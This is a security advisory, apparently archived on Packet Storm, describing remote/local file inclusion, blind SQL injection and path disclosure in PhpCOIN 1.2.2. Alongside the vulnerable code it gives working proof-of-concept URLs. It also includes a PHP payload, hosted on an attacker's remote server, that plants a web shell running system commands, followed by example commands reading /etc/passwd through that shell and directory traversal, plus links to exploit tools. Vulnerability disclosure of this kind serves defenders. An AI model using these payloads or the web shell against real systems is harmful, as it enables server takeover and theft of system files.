PhpCOIN version 1.2.2 is susceptible to arbitrary file inclusion, blind SQL injection, and path disclosure attacks.
06e0f015908740a626e9fcdad2aa017a<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure
software:
site: http://www.phpcoin.com/
description: "a free software package originally designed for web-hosting resellers
to handle clients, orders, invoices, notes and helpdesk, but no longer limited to
hosting resellers. phpCOIN is used by over twenty-five thousand people worldwide*,
including web-hosts, designers, lawyers, accountants, and a school band"
i) arbitrary remote/local inclusion:
vulnerable code in coin_includes/db.php at line 30-39:
...
# Determine Database and include proper class file
switch($_DBCFG['dbms'])
{
case "mysql":
require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
break;
default:
require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
break;
}
...
if register_globals on and allow_url_fopen on
you can include an arbitrary file from a remote location, poc:
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location]
on remote location you have this code in http:/[remote_location]/db_mysql.php/index.html:
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>
then you launch commands:
http://[target]/[path]/suntzu.php?cmd=cat%20/etc/passwd
if register_globals on and magic_quotes_gpc off you can include an arbitrary file
from local resources, poc:
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00
exploit tool here:
http://rgod.altervista.org/phpcoin_122_incl_xpl.html
ii) if magic_quotes_gpc off -> SQL injection through cookies:
exploit code here:
http://rgod.altervista.org/phpcoin_122_sql_xpl.html
iii) path disclosure, simply:
http://[target]/[path]/config.php
'cause in coin_includes/db.php _CCFG['_PKG_PATH_DBSE'] is not defined
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/phpcoin122.html
</span></span>
</code></pre>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!